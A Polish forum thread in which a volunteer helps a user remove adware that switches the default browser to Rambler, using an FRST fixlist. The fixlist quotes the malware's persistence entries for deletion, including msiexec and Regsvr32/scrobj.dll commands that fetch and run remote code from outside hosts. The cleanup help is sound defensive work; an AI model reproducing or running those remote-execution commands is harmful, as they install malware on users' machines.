Domyślna przeglądarka zamienia się na rambler


(Tomash300) #1

Złapałem jakiegoś wirusa który odpala mi reklamy i zmienia domyślną przeglądarkę na rambler. Próbowałem się tego pozbyć różnymi antywirami ale nie dały sobie rady. Proszę o pomoc !

Raporty z FRST

http://www.wklej.org/id/3095634/

http://www.wklej.org/id/3095635/


(Atis) #2

Odinstaluj Avira lub Avast.
Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

HKU\S-1-5-21-2526773658-465818872-1255696198-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj81MkF1M8ZSOUF4MjFcFTzXFkU2NTq2MWw1NdZQFjw4FF== /q IFEO\taskmgr.exe: [Debugger] BootExecute: autocheck autochk * sdnclean64.exe CHR StartupUrls: Default -> "hxxp://www.mystartsearch.com/?type=hp&ts=1422794017&from=amt&uid=CrucialXCT120M500SSD1_14130C0EDF280C0EDF28","hxxp://www.gazeta.pl/0,0.html?p=190" CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg] - hxxps://clients2.google.com/service/update2/crx 2017-04-21 22:44 - 2017-04-22 15:04 - 00000000 ____D C:\AdwCleaner 2017-04-22 01:34 - 2017-04-22 01:34 - 00029139 _____ C:\ProgramData\agent.1492817673.bdinstall.bin 2017-04-22 01:04 - 2017-04-22 01:04 - 00000000 ____D C:\Users\Tomash\AppData\Local\Bitdefender Antivirus Free 2017-04-22 01:03 - 2017-04-22 01:03 - 00000000 ____D C:\ProgramData\Bitdefender 2017-04-22 01:00 - 2017-04-22 01:00 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\QuickScan 2017-04-22 00:59 - 2017-04-22 00:59 - 00047380 _____ C:\ProgramData\agent.1492815567.bdinstall.bin 2017-04-22 00:59 - 2017-04-22 00:59 - 00000000 ____D C:\ProgramData\Bitdefender Agent 2017-04-21 22:28 - 2017-04-21 22:28 - 00000000 ____D C:\ProgramData\GridinSoft 2017-04-21 18:56 - 2017-04-21 18:56 - 00000000 ____D C:\WINDOWS\SysWOW64\extensions 2017-04-21 17:26 - 2017-04-21 17:26 - 00000000 ____D C:\Users\Tomash\AppData\Local\Boxbob 2017-04-21 17:26 - 2017-04-21 17:26 - 00000000 _____ C:\WINDOWS\SysWOW64\33 2017-04-21 17:26 - 2017-04-21 17:26 - 00000000 _____ C:\WINDOWS\SysWOW64\11 2017-04-20 20:07 - 2017-04-20 20:13 - 00000000 ____D C:\Users\Tomash\Doctor Web 2017-04-22 01:01 - 2016-10-02 14:57 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy 2017-04-22 00:59 - 2017-04-22 00:59 - 0047380 _____ () C:\ProgramData\agent.1492815567.bdinstall.bin 2017-04-22 01:34 - 2017-04-22 01:34 - 0029139 _____ () C:\ProgramData\agent.1492817673.bdinstall.bin Task: {257491A0-E2E7-4A0A-8398-6C9D24276368} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2016-08-15] () Task: {2A9AAD30-9E01-4FA4-BC32-8DA83A62AF6E} - System32\Tasks\{738B377B-4BB0-42CB-9AB2-2E3B76C7E91A} => pcalua.exe -a "C:\Program Files (x86)\NapiProjekt\unins000.exe" Task: {50438256-8FE7-4D83-9D40-6ACD40699A7B} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81MkF1M8ZSOUF4MjFcFTzXFkU2NTq2MWw1NdZQFjw4FF== scrobj.dll Task: {8F54CADF-FF1E-494C-9ED4-E30132DB4496} - System32\Tasks\GridinSoft Anti-Malware => C:\Program Files\GridinSoft Anti-Malware\gsam.exe Task: {983FF386-925E-4317-AC97-85BC343D4F9A} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81MkF1M8ZSOUF4MjFcFTzXFkU2NTq2MWw1NdZQFjw4FF== scrobj.dll HKLM\...\StartupApproved\Run32: => "SDTray" HKU\S-1-5-21-2526773658-465818872-1255696198-1001\...\StartupApproved\Run: => "SpybotPostWindows10UpgradeReInstall" RemoveProxy: EmptyTemp:

Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.


(Tomash300) #3

Fixlog

http://www.wklej.org/id/3095716/

raport

http://www.wklej.org/id/3095720/


(Atis) #4

Nadal działa proces od Aviry.
Skasuj folder C:\FRST


(Tomash300) #5

ok skasowałem Avire kompletnie

wygląda na to że już jest ok

czy może jeszcze coś powinienem zrobić?


(Atis) #6

Włącz przywracanie systemu dla dysku systemowego C:
https://www.tenforums.com/tutorials/4533-turn-off-system-protection-drives-windows-10-a.html


(Tomash300) #7

Włączyłem.
Wielkie dzięki za pomoc